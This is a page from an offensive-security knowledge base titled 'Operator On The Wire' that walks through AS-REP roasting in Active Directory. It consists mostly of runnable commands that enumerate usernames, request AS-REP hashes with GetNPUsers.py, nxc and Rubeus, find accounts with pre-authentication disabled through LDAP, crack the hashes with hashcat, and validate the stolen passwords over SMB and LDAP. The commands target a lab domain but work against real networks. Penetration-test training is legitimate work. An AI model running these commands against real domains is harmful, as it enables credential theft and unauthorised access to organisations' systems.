Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Roasting / Asreproasting

Attack

AS-REP roasting targets user accounts that do not require Kerberos pre-authentication. We ask the domain controller for an AS-REP for the target account, save the encrypted response, and crack it offline.

Linux unauthenticated user list

kerbrute userenum -d ootw.local --dc 10.10.10.200 users.txt
GetNPUsers.py ootw.local/ -dc-ip 10.10.10.200 -usersfile users.txt -format hashcat -outputfile asrep.hashes

Linux with valid credentials

GetNPUsers.py ootw.local/student:'student' -dc-ip 10.10.10.200 -format hashcat -outputfile asrep.hashes
nxc ldap 10.10.10.200 -u student -p 'student' --asreproast asrep.hashes

Linux with NTLM

GetNPUsers.py ootw.local/student -dc-ip 10.10.10.200 -hashes :<NTLM_HASH> -format hashcat -outputfile asrep.hashes

Windows with Rubeus

Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashes
Rubeus.exe asreproast /user:target.user /format:hashcat /nowrap

LDAP confirmation

ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName userAccountControl

Crack

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt --show

Validate

nxc smb 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u target.user -p '<CRACKED_PASSWORD>' -d ootw.local

Notes

AS-REP roasting does not require a password when we already have a valid username list. That makes username enumeration important. The attack only works when pre-authentication is disabled on the target account.

The useful output starts with $krb5asrep$23$. If no hashes come back, either the usernames are wrong, pre-authentication is enabled, or the domain controller is not reachable.